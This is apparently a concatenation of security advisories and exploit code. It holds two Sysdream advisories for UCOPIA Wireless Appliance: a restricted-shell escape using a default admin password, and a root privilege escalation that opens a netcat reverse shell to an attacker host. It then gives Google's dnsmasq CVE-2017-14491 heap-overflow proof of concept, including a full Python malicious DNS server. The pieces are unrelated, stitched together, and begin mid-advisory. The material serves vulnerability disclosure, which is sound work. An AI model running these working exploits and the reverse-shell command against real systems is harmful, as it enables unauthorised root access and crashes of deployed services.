* 21/06/2017 : New version has been released.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
# [CVE-2017-11321] UCOPIA Wireless Appliance < 5.1.8 Restricted Shell Escape
## Asset Description
UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.
More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.
The affected asset in this report is a WiFi management appliance.
## Vulnerability
Shell Escape via `less` command.
**Threat**
Improper sanitization of system commands in the restricted shell interface in UCOPIA Wireless Appliance, prior to 5.1.8, allows remote attackers to gain access to a system shell as the "admin" user.
**CVE ID**: CVE-2017-11321
**Access Vector**: network
**Security Risk**: critical
**Vulnerability**: CWE-78
**CVSS Base Score**: 9.1 (Critical)
**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept: Restricted Shell Escape
By default, the UCOPIA wireless appliances exposes two shell access on port 22 (SSH) and 222 (ShellInTheBox).
A documented **admin** user exists on the system with the password **bhu85tgb**.
Quoted from the documentation :
> You can also retrieve the IP address of the outgoing interface. For this, you need to log in to the terminal of the virtual machine with
the following username and password: admin/bhu85tgb, and then execute the interface command.
By logging in within these interfaces, we can access to a restricted shell (*clish*) that allows only a few commands.
However, the `less` command is allowed, and because `less` allows to execute shell commands when viewing a file, we can use it to escape the restricted shell.
Steps :
**1/** Login to the appliance using SSH or ShellInTheBox.
**2/** Run the `less /etc/passwd` command.
**3/** When viewing the file, type `!sh`
**4/** You now have unrestricted `admin` user access to the appliance.
```
> less /etc/passwd
!sh
$ ls /
bin dev etc home lib proc tmp user
$ whoami
admin
```
## Solution
Update to UCOPIA 5.1.8
## Timeline (dd/mm/yyyy)
* 08/03/2017 : Vulnerability discovery.
* 03/05/2017 : Initial contact.
* 10/05/2017 : GPG Key exchange.
* 10/05/2017 : Advisory sent to vendor.
* 17/05/2017 : Request for feedback.
* 22/05/2017 : Vendor acknowledge the vulnerabilities.
* 21/06/2017 : Sysdream Labs request for an ETA, warning for public disclosure.
* 21/06/2017 : Vendor say that the UCOPIA 5.1.8 fixes the issue.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
# [CVE-2017-11322] UCOPIA Wireless Appliance < 5.1.8 Privileges Escalation
## Asset description
UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.
More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.
The affected asset in this report is a WiFi management appliance.
## Vulnerability
CHROOT escape and privileges escalation.
**Threat**
Improper sanitization of system commands in the chroothole_client executable in UCOPIA Wireless Appliance, prior to 5.1.8, allows local attackers to elevate privileges to root user and escape from the *chroot*.
**CVE ID**: CVE-2017-11322
**Access Vector**: local
**Security Risk**: high
**Vulnerability**: CWE-78
**CVSS Base Score**: 8.2 (High)
**CVSS Vector**: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept: chroot escape / privileges escalation
The **chroothole_client** binary is used by the appliance to run programs outside the *chroot*, as the **root** user.
Because of an improper sanitization of system commands, we managed to gain a complete **root** access to the appliance, outside the *chroot*.
```
$ chroothole_client '/usr/sbin/status'
is not running ... failed !
$ chroothole_client '/usr/sbin/status $(which nc)'
/bin/nc is not running ... failed!
$ chroothole_client '/usr/sbin/status $(nc 10.0.0.125 4444 -e /bin/sh)'
```
Attacker terminal :
```
$ ncat -lvp 4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.0.1:49156.
whoami
root
```
## Solution
Update to UCOPIA 5.1.8
## Timeline (dd/mm/yyyy)
* 08/03/2017 : Vulnerability discovery.
* 03/05/2017 : Initial contact.
* 10/05/2017 : GPG Key exchange.
* 10/05/2017 : Advisory sent to vendor.
* 17/05/2017 : Request for feedback.
* 22/05/2017 : Vendor acknowledge the vulnerabilities.
* 21/06/2017 : Sysdream Labs request for an ETA, warning for public disclosure.
* 21/06/2017 : Vendor say that the UCOPIA 5.1.8 fixes the issue.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open three terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
docker exec -it <container_id> bash
2) On one terminal let’s launch attacker controlled DNS server:
# python poc.py 127.0.0.2 53
Listening at 127.0.0.2:53
3) On another terminal let’s launch dnsmasq forwarding queries to attacker controlled DNS:
# /testing/dnsmasq/src/dnsmasq -p 53535 --no-daemon --log-queries -S 127.0.0.2 --no-hosts --no-resolv
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq: using nameserver 127.0.0.2#53
dnsmasq: cleared cache
4) Let’s fake a client making a request twice (or more) so we hit the dnsmasq cache:
# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
5) The crash might not be triggered on the first try due to the non-deterministic order of the dnsmasq cache. Restarting dnsmasq and retrying should be sufficient to trigger a crash.
==1159==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62200001dd0b at pc 0x0000005105e7 bp 0x7fff6165b9b0 sp 0x7fff6165b9a8
WRITE of size 1 at 0x62200001dd0b thread T0
#0 0x5105e6 in add_resource_record /test/dnsmasq/src/rfc1035.c:1141:7
#1 0x5127c8 in answer_request /test/dnsmasq/src/rfc1035.c:1428:11
#2 0x534578 in receive_query /test/dnsmasq/src/forward.c:1439:11
#3 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
#4 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
#5 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
0x62200001dd0b is located 0 bytes to the right of 5131-byte region [0x62200001c900,0x62200001dd0b)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
#3 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-buffer-overflow /test/dnsmasq/src/rfc1035.c:1141:7 in add_resource_record
Shadow bytes around the buggy address:
0x0c447fffbb50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c447fffbba0: 00[03]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1159==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
import socket
import struct
import sys
def dw(x):
return struct.pack('>H', x)
def udp_handler(sock_udp):
data, addr = sock_udp.recvfrom(1024)
print '[UDP] Total Data len recv ' + str(len(data))
id = struct.unpack('>H', data[0:2])[0]
query = data[12:]
data = dw(id) # id
data += dw(0x85a0) # flags
data += dw(1) # questions
data += dw(0x52) # answers
data += dw(0) # authoritative
data += dw(0) # additional
# Add the question back - we're just hardcoding it
data += ('\x03125\x018\x018\x018\x07in-addr\x04arpa\x00' +
'\x00\x0c' + # type = 'PTR'
'\x00\x01') # cls = 'IN'
# Add the first answer
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x04\x00' + # size of this resource record
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x0e' + 'Z'*14 +
'\x00')
# Add the next answer, which is written out in full
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x00\x26' + # size of this resource record
'\x08DCBBEEEE\x04DDDD\x08CCCCCCCC\x04AAAA\x04BBBB\x03com\x00')
for _ in range(79):
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x00\x02' + # size of the compressed resource record
'\xc4\x40') # pointer to the second record's name
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x00\x11' + # size of this resource record
'\x04EEEE\x09DAABBEEEE\xc4\x49')
sock_udp.sendto(data, addr)
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>\n' % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_udp.bind((ip, port))
print 'Listening at %s:%d\n' % (ip, port)
while True:
udp_handler(sock_udp)
sock_udp.close()